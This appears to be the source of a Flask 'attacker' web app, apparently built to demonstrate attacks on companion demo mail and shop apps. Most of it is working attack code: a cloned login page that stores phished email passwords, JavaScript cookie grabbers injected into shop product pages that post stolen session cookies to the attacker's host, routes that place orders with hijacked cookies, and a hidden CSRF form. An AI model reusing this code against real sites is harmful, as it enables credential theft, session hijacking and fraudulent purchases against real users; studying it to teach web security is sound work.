attacker/project/__init__.py
"""Flask application module."""

import os

from flask import Flask
from flask_cors import CORS

from .database import init_db
from .routes.index import bp as index_bp
from .routes.mail import bp as mail_bp
from .routes.shop import bp as shop_bp


def create_app() -> Flask:
    """Create an application instance."""

    app = Flask(__name__)
    app.config["SECRET_KEY"] = os.urandom(32)

    init_db(app)

    app.register_blueprint(index_bp)
    app.register_blueprint(mail_bp)
    app.register_blueprint(shop_bp)

    CORS(app)
    return app

attacker/project/routes/index.py
"""Index route."""

from flask import Blueprint, render_template

bp = Blueprint("index", __name__)


@bp.route("/")
def index() -> str:
    """Index page."""
    return render_template("index.html")

attacker/project/routes/mail.py
"""Mail attack module."""

from os import environ

import requests
from flask import Blueprint, redirect, render_template, request
from flask_cors import cross_origin
from werkzeug import Response

from ..const import MAIL_PASSWORD, MAIL_USERNAME
from ..database import MailUser, db

bp = Blueprint("mail", __name__)
session = requests.Session()


@bp.route("/phish/")
def phishing() -> str:
    """Stolen mail credentials page."""

    mail_users = MailUser.query.all()
    return render_template("phishing.html", users=mail_users)


@bp.route("/upgrade/")
def upgrade() -> str:
    """Render the fake login page."""
    return render_template("fake_login.html", MAIL_URL=environ["MAIL_URL"])


@bp.route("/upgrade/", methods=["POST"])
@cross_origin()
def upgrade_post() -> Response:
    """Save stolen mail credentials."""

    email = request.form["email"]

    if "password" not in request.form:
        # If the password is not provided, send a fake upgrade offer

        send_mail(
            email,
            "Account upgrade",
            f"Do you want to upgrade your account to premium? Visit {environ['ATTACKER_URL']}/upgrade/ to do so.",
        )
        return Response(status=204)

    # Otherwise, save the credentials
    password = request.form["password"]

    user = MailUser(email=email, password=password)
    db.session.add(user)
    db.session.commit()

    # Code 307 is used to preserve the request method
    return redirect(environ["MAIL_URL"] + "/login/", code=307)


@bp.route("/lottery/")
def csrf() -> str:
    """Fake lottery page for CSRF."""

    return render_template("csrf.html", MAIL_URL=environ["MAIL_URL"], MAIL_USERNAME=MAIL_USERNAME)


@bp.route("/lottery/", methods=["POST"])
def csrf_post() -> Response:
    """Send a fake lottery win email."""

    email = request.form["email"]
    send_mail(
        email,
        "You won the lottery!",
        f"You won the lottery! Visit {environ['ATTACKER_URL']}/lottery/ to claim your prize!",
    )

    return Response(status=204)


def send_mail(email: str, subject: str, body: str) -> None:
    """Send a mail to a user."""

    form = {
        "recipient": email,
        "subject": subject,
        "body": body,
    }

    login()
    session.post(environ["MAIL_URL"] + "/compose/", data=form)


def login() -> None:
    """Login to Vulpes Mail."""

    form = {
        "email": MAIL_USERNAME,
        "password": MAIL_PASSWORD,
    }

    response = session.post(environ["MAIL_URL"] + "/login/", data=form)

    if response.url.endswith("/login/"):
        signup()


def signup() -> None:
    """Create a mail account in Vulpes Mail."""

    form = {
        "username": MAIL_USERNAME,
        "password": MAIL_PASSWORD,
        "password2": MAIL_PASSWORD,
    }

    session.post(environ["MAIL_URL"] + "/signup/", data=form)

attacker/project/routes/shop.py
"""Shop attack module."""

from os import environ

import requests
from flask import Blueprint, redirect, render_template, request, url_for
from werkzeug import Response

from ..database import ShopCookie, add_cookie

bp = Blueprint("shop", __name__)
session = requests.Session()


@bp.route("/hijack/")
def hijacking() -> str:
    """Session hijacking page."""

    shop_cookies = ShopCookie.query.all()

    if not shop_cookies:
        place_cookie_grabbers()
        shop_cookies = ShopCookie.query.all()

    return render_template("hijacking.html", cookies=shop_cookies, shop_url=environ["SHOP_URL"])


@bp.route("/hijack-cookie/", methods=["POST"])
def cookie() -> str:
    """Save stolen shop cookie."""

    cookie = request.form["cookie"]
    add_cookie(cookie)

    return "Cookie saved."


@bp.route("/hijack-order/", methods=["POST"])
def order() -> Response:
    """Put an item into the cart with someone else's cookie."""

    form = request.form
    product_url = form["product_url"]
    quantity = int(form["quantity"])
    cookie = form["cookie"]

    add_to_cart(product_url, quantity, cookie)
    return redirect(url_for("shop.hijacking"))


@bp.route("/hijack-checkout/", methods=["POST"])
def checkout() -> Response:
    """Place an order with someone else's cookie."""

    cookie = request.form["cookie"]
    place_order(cookie)

    return redirect(url_for("shop.hijacking"))


@bp.route("/hijack-silent/", methods=["POST"])
def silent() -> Response:
    """Silently place an order with someone else's cookie."""

    cookie = request.form["cookie"].lstrip("session=")
    add_to_cart("eclair", 99, cookie)
    place_order(cookie)

    return redirect(url_for("shop.hijacking"))


def place_cookie_grabbers() -> None:
    """Place a cookie grabbers on the shop page."""

    place_silent_grabber()
    place_interactive_grabber()


def place_silent_grabber() -> None:
    """Place a silent cookie grabber on the eclair product page.

    It steals a cookie and places an order without user interaction.
    """

    product_url = environ["SHOP_URL"] + "/product/eclair/"
    data = {
        "text": f"""<script>
            $.ajax({{
                url: "{environ["ATTACKER_URL"]}/hijack-silent/",
                type: "POST",
                data: {{ cookie: document.cookie }}
            }});
        </script>""",
    }
    session.post(product_url, data=data)


def place_interactive_grabber() -> None:
    """Place an interactive cookie grabber on the cupcake product page.

    It steals a cookie, but then requires user interaction to do anything with it.
    """

    product_url = environ["SHOP_URL"] + "/product/cupcake/"
    data = {
        "text": f"""
            <h4>Cookie grabber</h4>
            <script>
                $.ajax({{
                    url: "{environ["ATTACKER_URL"]}/hijack-cookie/",
                    type: "POST",
                    data: {{ cookie: document.cookie }}
                }});
                alert("I have just stolen your cookies: " + document.cookie);
            </script>""",
    }
    session.post(product_url, data=data)
    add_cookie("Cookie grabbers were placed.")


def add_to_cart(product_url: str, quantity: int, cookie: str) -> None:
    """Add an item to the cart with someone else's cookie."""

    url = environ["SHOP_URL"] + "/cart/"
    data = {"product_url": product_url, "quantity": quantity}

    session.cookies.set("session", cookie)
    session.post(url, data=data)


def place_order(cookie: str) -> None:
    """Place an order with someone else's cookie."""

    url = environ["SHOP_URL"] + "/checkout/"
    data = {
        "first_name": "John",
        "last_name": "Doe",
        "address": "1 Hacker Way",
        "city": "Hacker City",
    }

    session.cookies.set("session", cookie)
    session.post(url, data=data)

attacker/project/templates/csrf.html
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Lottery</title>
    </head>

    <body>
        <h1>Lottery</h1>
        You have won the lottery. Click this button to claim your prize:
        <form action="{{ MAIL_URL }}/compose/" method="post">
            <input name="recipient" value="{{ MAIL_USERNAME }}" hidden />
            <input name="subject" value="CSRF mail" hidden />
            <input name="body" value="This email has been sent by a CSRF attack." hidden />
            <input type="submit" value="Claim prize" />
        </form>
    </body>
</html>

attacker/project/templates/fake_login.html
<!DOCTYPE html>
<html lang="en">

    <head>
        <title>Vulpes Mail</title>
        <link rel="stylesheet" href="{{ MAIL_URL }}/static/style.css" />
        <link rel="stylesheet" href="{{ MAIL_URL }}/static/auth.css" />
    </head>

    <body>
        <div class="auth">
            <img src="{{ MAIL_URL }}/static/logo.svg" width=256 height=256 alt="Vulpes Mail" />

            <h1>Login</h1>

            <form method="post">
                <input id="email" minlength="4" name="email" placeholder="Username or email" required type="text" value="" />
                <input id="password" minlength="8" name="password" placeholder="Password" required type="password" value="" />
                <input id="submit" name="submit" type="submit" value="Log in" />
            </form>

            <div>
                Are you new? <a href="{{ MAIL_URL }}/signup/">Signup</a> first
            </div>
        </div>
    </body>
</html>

attacker/project/templates/hijacking.html
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Stolen shop cookies</title>
    </head>

    <body>
        <h1>Stolen shop cookies</h1>
            {{ cookies[0].cookie }}
        <p>Here are the stolen cookies:</p>
        <ul>
            {% for cookie in cookies[1:] %}
                <li>
                    {{ cookie.cookie }}
                    <form action="{{ url_for('shop.order') }}" method="post">
                        <input name="product_url" type="text" value="cupcake" hidden/>
                        <input name="quantity" type="number" value="99" hidden/>
                        <input name="cookie" type="text" value="{{ cookie.cookie }}" hidden/>
                        <input type="submit" value="Order 99 cupcakes" />
                    </form>
                    <form action="{{ url_for('shop.checkout') }}" method="post">
                        <input name="cookie" type="text" value="{{ cookie.cookie }}" hidden/>
                        <input type="submit" value="Checkout" />
                    </form>
                </li>
            {% else %}
                <li>No cookies stolen yet</li>
            {% endfor %}
        </ul>
    </body>
</html>

attacker/project/templates/index.html
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Attacker app</title>
        <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}" />
    </head>
    <body>
        <h1>Attacker app</h1>
        
        <ul id="links">
            <a href="{{ url_for('mail.phishing') }}">Phishing</a>
            <a href="{{ url_for('shop.hijacking') }}">Session hijacking</a>
            <a href="{{ url_for('mail.csrf') }}">Cross-site request forgery</a>
        </ul>

    </body>
</html>

attacker/project/templates/phishing.html
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Stolen mail credentials</title>
    </head>

    <body>
        <h1>Stolen mail credentials</h1>
        You can visit the <a href="{{ url_for('mail.upgrade') }}">fake login page</a> to see how it looks like.
        <p>Here are the stolen mails:</p>
        <ul>
            {% for user in users %}
                <li>{{ user.email }}: {{ user.password }}</li>
            {% else %}
                <li>No credentials stolen yet</li>
            {% endfor %}
        </ul>
    </body>
</html>